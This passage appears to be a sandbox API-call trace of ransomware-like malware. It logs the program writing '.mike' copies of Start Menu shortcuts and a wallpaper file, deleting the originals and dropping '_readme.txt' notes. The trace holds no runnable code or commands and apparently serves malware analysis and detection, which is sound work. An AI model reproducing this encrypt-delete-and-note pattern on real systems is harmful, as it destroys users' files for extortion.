lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.mike", lpFilePart=0x0) returned 0x76 [0159.043] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.043] GetFileType (hFile=0x1c8) returned 0x1 [0159.044] GetFileType (hFile=0x1c8) returned 0x1 [0159.044] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0159.044] WriteFile (in: hFile=0x1c8, lpBuffer=0x21402bc*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x21402bc*, lpNumberOfBytesWritten=0x2aef0c*=0x110, lpOverlapped=0x0) returned 1 [0159.045] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.045] GetFileType (hFile=0x1c8) returned 0x1 [0159.045] GetFileType (hFile=0x1c8) returned 0x1 [0159.046] WriteFile (in: hFile=0x1c8, lpBuffer=0x2143548*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef3c, lpOverlapped=0x0 | out: lpBuffer=0x2143548*, lpNumberOfBytesWritten=0x2aef3c*=0x20c, lpOverlapped=0x0) returned 1 [0159.047] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk", dwFileAttributes=0x80) returned 1 [0159.047] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk")) returned 1 [0159.048] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0159.049] GetFileType (hFile=0x1c8) returned 0x1 [0159.049] GetFileType (hFile=0x1c8) returned 0x1 [0159.050] WriteFile (in: hFile=0x1c8, lpBuffer=0x2146f18*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef50, lpOverlapped=0x0 | out: lpBuffer=0x2146f18*, lpNumberOfBytesWritten=0x2aef50*=0x45e, lpOverlapped=0x0) returned 1 [0159.051] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.051] GetFileType (hFile=0x1c8) returned 0x1 [0159.052] GetFileType (hFile=0x1c8) returned 0x1 [0159.052] CloseHandle (hObject=0x1c8) returned 1 [0159.052] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0159.053] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk", nBufferLength=0x105, lpBuffer=0x2aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk", lpFilePart=0x0) returned 0x82 [0159.053] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.054] GetFileType (hFile=0x1c8) returned 0x1 [0159.054] GetFileType (hFile=0x1c8) returned 0x1 [0159.054] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0159.054] WriteFile (in: hFile=0x1c8, lpBuffer=0x214e300*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x214e300*, lpNumberOfBytesWritten=0x2aef0c*=0x220, lpOverlapped=0x0) returned 1 [0159.055] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.056] GetFileType (hFile=0x1c8) returned 0x1 [0159.056] GetFileType (hFile=0x1c8) returned 0x1 [0159.056] ReadFile (in: hFile=0x1c8, lpBuffer=0x214f4d0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x214f4d0*, lpNumberOfBytesRead=0x2aef18*=0x5db, lpOverlapped=0x0) returned 1 [0159.058] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.mike", nBufferLength=0x105, lpBuffer=0x2ae998, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.mike", lpFilePart=0x0) returned 0x87 [0159.059] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.059] GetFileType (hFile=0x1c8) returned 0x1 [0159.059] GetFileType (hFile=0x1c8) returned 0x1 [0159.059] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0159.060] WriteFile (in: hFile=0x1c8, lpBuffer=0x2154744*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x2154744*, lpNumberOfBytesWritten=0x2aef0c*=0x5e0, lpOverlapped=0x0) returned 1 [0159.060] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.061] GetFileType (hFile=0x1c8) returned 0x1 [0159.061] GetFileType (hFile=0x1c8) returned 0x1 [0159.062] WriteFile (in: hFile=0x1c8, lpBuffer=0x2157a10*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef3c, lpOverlapped=0x0 | out: lpBuffer=0x2157a10*, lpNumberOfBytesWritten=0x2aef3c*=0x20c, lpOverlapped=0x0) returned 1 [0159.062] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk", dwFileAttributes=0x80) returned 1 [0159.064] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk")) returned 1 [0159.065] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0159.066] GetFileType (hFile=0x1c8) returned 0x1 [0159.066] GetFileType (hFile=0x1c8) returned 0x1 [0159.066] WriteFile (in: hFile=0x1c8, lpBuffer=0x215b5c4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef50, lpOverlapped=0x0 | out: lpBuffer=0x215b5c4*, lpNumberOfBytesWritten=0x2aef50*=0x45e, lpOverlapped=0x0) returned 1 [0159.067] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.068] GetFileType (hFile=0x1c8) returned 0x1 [0159.068] GetFileType (hFile=0x1c8) returned 0x1 [0159.068] CloseHandle (hObject=0x1c8) returned 1 [0159.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0159.069] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk", nBufferLength=0x105, lpBuffer=0x2aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk", lpFilePart=0x0) returned 0x7c [0159.069] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.070] GetFileType (hFile=0x1c8) returned 0x1 [0159.070] GetFileType (hFile=0x1c8) returned 0x1 [0159.070] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0159.071] WriteFile (in: hFile=0x1c8, lpBuffer=0x2160680*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x2160680*, lpNumberOfBytesWritten=0x2aef0c*=0x220, lpOverlapped=0x0) returned 1 [0159.072] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.072] GetFileType (hFile=0x1c8) returned 0x1 [0159.072] GetFileType (hFile=0x1c8) returned 0x1 [0159.072] ReadFile (in: hFile=0x1c8, lpBuffer=0x2161838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x2161838*, lpNumberOfBytesRead=0x2aef18*=0x51a, lpOverlapped=0x0) returned 1 [0159.074] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.mike", nBufferLength=0x105, lpBuffer=0x2ae998, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.mike", lpFilePart=0x0) returned 0x81 [0159.075] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.075] GetFileType (hFile=0x1c8) returned 0x1 [0159.075] GetFileType (hFile=0x1c8) returned 0x1 [0159.075] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0159.076] WriteFile (in: hFile=0x1c8, lpBuffer=0x2166614*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2aef0c, lpOverlapped=0x0 | out: lpBuffer=0x2166614*, lpNumberOfBytesWritten=0x2aef0c*=0x520, lpOverlapped=0x0) returned 1 [0159.077] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.077] GetFileType (hFile=0x1c8) returned 0x1 [0159.077] GetFileType (hFile=0x1c8) returned 0x1 [0159.078] WriteFile (in: hFile=0x1c8, lpBuffer=0x21698c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef3c, lpOverlapped=0x0 | out: lpBuffer=0x21698c8*, lpNumberOfBytesWritten=0x2aef3c*=0x20c, lpOverlapped=0x0) returned 1 [0159.079] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk", dwFileAttributes=0x80) returned 1 [0159.079] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk")) returned 1 [0159.081] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0159.082] GetFileType (hFile=0x1c8) returned 0x1 [0159.082] GetFileType (hFile=0x1c8) returned 0x1 [0159.082] WriteFile (in: hFile=0x1c8, lpBuffer=0x216d3d4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef50, lpOverlapped=0x0 | out: lpBuffer=0x216d3d4*, lpNumberOfBytesWritten=0x2aef50*=0x45e, lpOverlapped=0x0) returned 1 [0159.086] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.086] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.087] CoTaskMemFree (pv=0x508980) [0159.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.089] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.089] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.089] CoTaskMemFree (pv=0x508980) [0159.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.091] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.091] GetFileType (hFile=0x1c8) returned 0x1 [0159.109] GetFileType (hFile=0x1c8) returned 0x1 [0159.109] CloseHandle (hObject=0x1c8) returned 1 [0159.109] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0159.110] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk", nBufferLength=0x105, lpBuffer=0x2aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk", lpFilePart=0x0) returned 0x5b [0159.110] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.111] GetFileType (hFile=0x1c8) returned 0x1 [0159.111] GetFileType (hFile=0x1c8) returned 0x1 [0159.111] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0159.111] WriteFile (in: hFile=0x1c8, lpBuffer=0x217c7b4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef54, lpOverlapped=0x0 | out: lpBuffer=0x217c7b4*, lpNumberOfBytesWritten=0x2aef54*=0x220, lpOverlapped=0x0) returned 1 [0159.113] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.113] GetFileType (hFile=0x1c8) returned 0x1 [0159.113] GetFileType (hFile=0x1c8) returned 0x1 [0159.113] ReadFile (in: hFile=0x1c8, lpBuffer=0x217d900, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x217d900*, lpNumberOfBytesRead=0x2aef60*=0x106, lpOverlapped=0x0) returned 1 [0159.115] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.mike", nBufferLength=0x105, lpBuffer=0x2ae9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.mike", lpFilePart=0x0) returned 0x60 [0159.115] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.115] GetFileType (hFile=0x1c8) returned 0x1 [0159.116] GetFileType (hFile=0x1c8) returned 0x1 [0159.116] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0159.116] WriteFile (in: hFile=0x1c8, lpBuffer=0x2180e14*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2aef54, lpOverlapped=0x0 | out: lpBuffer=0x2180e14*, lpNumberOfBytesWritten=0x2aef54*=0x110, lpOverlapped=0x0) returned 1 [0159.116] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0159.117] GetFileType (hFile=0x1c8) returned 0x1 [0159.118] WriteFile (in: hFile=0x1c8, lpBuffer=0x2184060*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aef84, lpOverlapped=0x0 | out: lpBuffer=0x2184060*, lpNumberOfBytesWritten=0x2aef84*=0x20c, lpOverlapped=0x0) returned 1 [0159.119] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk", dwFileAttributes=0x80) returned 1 [0159.119] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk")) returned 1 [0159.121] WriteFile (in: hFile=0x1c8, lpBuffer=0x2187768*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef98, lpOverlapped=0x0 | out: lpBuffer=0x2187768*, lpNumberOfBytesWritten=0x2aef98*=0x45e, lpOverlapped=0x0) returned 1 [0159.125] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.125] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.125] CoTaskMemFree (pv=0x508980) [0159.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.127] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.127] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.128] CoTaskMemFree (pv=0x508980) [0159.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.129] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0159.129] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.130] CoTaskMemFree (pv=0x508980) [0159.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.131] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0159.132] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg", lpFilePart=0x0) returned 0x51 [0159.132] WriteFile (in: hFile=0x1c8, lpBuffer=0x2194a10*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x2194a10*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0159.137] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 [0159.139] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.mike", lpFilePart=0x0) returned 0x56 